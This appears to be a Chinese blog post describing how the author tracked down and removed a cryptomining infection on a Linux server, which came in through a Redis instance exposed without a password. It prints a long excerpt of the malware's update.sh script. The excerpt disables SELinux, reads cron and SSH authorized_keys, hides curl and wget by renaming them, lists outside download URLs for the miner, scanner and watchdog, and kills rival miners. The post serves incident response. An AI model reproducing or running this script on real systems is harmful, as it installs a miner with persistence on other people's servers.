linux cpu100%占用排查解决
挖矿病毒
排查
今天上线发现linux cpu飙升到100%
输入top -c 命令找到最号cpu的进程
top -c
2.使用 kill -9后 几秒会后 又起起来了
3.输入命令
ls -l /proc/{pid号}/exe
4. 我们进入etc目录下面看看
5.发现里面有个update.sh脚本文件 打开看看
etenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur miner_url="https://de.gsearch.com.de/api/sysupdate" miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate" miner_size="1102480" sh_url="https://de.gsearch.com.de/api/update.sh" sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh" config_url="https://de.gsearch.com.de/api/config.json" config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json" config_size="3356" scan_url="https://de.gsearch.com.de/api/networkservice" scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice" scan_size="2584072" watchdog_url="https://de.gsearch.com.de/api/sysguard" watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard" watchdog_size="1929480" kill_miner_proc() { ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9 ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9 ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9 ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9 ps ax|grep -o './[0-9]* -c'| xargs pkill -f ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback "update.sh" [readonly] 961L, 37659C
6.看不懂 试着在百度搜了一下这个地址
https://de.gsearch.com.de/api/sysupdate
6.确定这个就是那个自启动挖矿脚本 删除
rm -rf update.sh
tmd发现没权限删除
7.使用lsattr chattr2个命令
lsattr update.sh # 发现有 i 所以要干掉i才能删除 chattr -i update.sh rm -rf update.sh # 删除成功
8.杀掉进程
kill -9 13586
9.同样的步骤 删除networkservie
分析如何中毒的
1.安装了redis打开了端口外网访问。但是并没有设置密码
2.top找到redis进程和安装目录
cd /proc/5913
ll
设置密码可参考
https://blog.csdn.net/qq_26440803/article/details/82967433
3.关闭端口任意机器可访问 限制指定机器ip
第二次杀毒
以为昨晚上面这些以为就万事大吉 结果没一会儿又出现了 参考博文:https://www.cnblogs.com/brishenzhou/p/11770478.html
